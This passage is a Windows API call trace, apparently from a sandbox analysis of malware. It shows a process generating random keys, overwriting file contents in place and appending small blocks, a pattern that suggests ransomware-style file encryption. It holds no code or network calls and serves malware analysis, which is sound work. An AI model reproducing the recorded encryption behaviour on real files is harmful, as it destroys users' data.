returned 0x4f10000 [0083.467] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.467] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.467] GetProcessHeap () returned 0x4f10000 [0083.467] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.467] ReadFile (in: hFile=0x948, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.515] SetFilePointerEx (in: hFile=0x948, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.515] WriteFile (in: hFile=0x948, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.515] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.515] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.515] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.516] GetProcessHeap () returned 0x4f10000 [0083.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.517] GetProcessHeap () returned 0x4f10000 [0083.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.518] GetProcessHeap () returned 0x4f10000 [0083.518] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.519] GetProcessHeap () returned 0x4f10000 [0083.519] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.519] SetFilePointerEx (in: hFile=0x948, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.520] WriteFile (in: hFile=0x948, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.520] WriteFile (in: hFile=0x948, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.520] GetProcessHeap () returned 0x4f10000 [0083.520] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.520] GetProcessHeap () returned 0x4f10000 [0083.520] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.520] GetProcessHeap () returned 0x4f10000 [0083.520] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.520] CloseHandle (hObject=0x948) returned 1 [0083.523] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 114 [0083.523] SetFilePointerEx (in: hFile=0x94c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.523] ReadFile (in: hFile=0x94c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.523] SetFilePointerEx (in: hFile=0x94c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.523] GetProcessHeap () returned 0x4f10000 [0083.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.523] GetProcessHeap () returned 0x4f10000 [0083.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.523] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.523] GetProcessHeap () returned 0x4f10000 [0083.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.523] ReadFile (in: hFile=0x94c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x8a6, lpOverlapped=0x0) returned 1 [0083.550] SetFilePointerEx (in: hFile=0x94c, liDistanceToMove=0xfffff75a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.550] WriteFile (in: hFile=0x94c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x8a6, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x8a6, lpOverlapped=0x0) returned 1 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.550] GetProcessHeap () returned 0x4f10000 [0083.550] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.551] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.551] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.552] GetProcessHeap () returned 0x4f10000 [0083.552] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.553] GetProcessHeap () returned 0x4f10000 [0083.553] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 